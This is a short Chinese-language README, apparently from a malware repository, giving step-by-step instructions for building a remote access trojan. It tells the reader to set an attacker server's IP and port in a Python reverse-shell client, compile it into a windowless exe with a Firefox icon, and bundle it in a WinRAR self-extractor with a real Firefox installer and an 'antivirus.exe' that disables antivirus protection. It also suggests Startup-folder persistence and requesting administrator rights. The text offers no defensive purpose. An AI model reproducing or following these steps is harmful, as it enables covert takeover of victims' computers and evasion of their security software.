使用 WinRar 创建的远程访问木马,包含安装程序(如 Firefox)和嵌入的 Python 反向 Shell。
编辑 client.py 文件,设置监听攻击服务器的 IP 和端口,以及攻击机器上任何代理的 IP 和端口。如果没有代理,请注释掉相应的部分。
将 client.py 转换为 exe,我使用了 pyinstaller:pyinstaller -w -i "Firefox.ico" -F client.py。-w 选项允许创建无窗口 .exe,-F 选项允许只生成一个文件。
使用 WinRAR 创建自解压 ZIP,选择三个文件:一个无害的安装程序(例如 "firefox installer.exe")、client.exe 和 antivirus.exe。 在自解压模块的设置中,设置文件执行顺序,首先是无害的安装程序,然后是 client.exe;勾选将文件解压到临时文件夹的复选框,或者如果你想更恶意一些,指定文件在系统启动时运行的文件夹(%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup)。 同样在自解压模块的设置中,选择请求管理员权限运行。 antivirus.exe 是一个无窗口的 .exe,用于禁用杀毒软件。它将在连接到服务器之前由 client.exe 启动。
antivirus.bat 文件包含同名的 .exe 文件的代码以及另一个可选功能。 我使用了 "Slimm bat to exe.exe" 将 .bat 文件转换为无窗口的 .exe 文件。
玩得开心 :)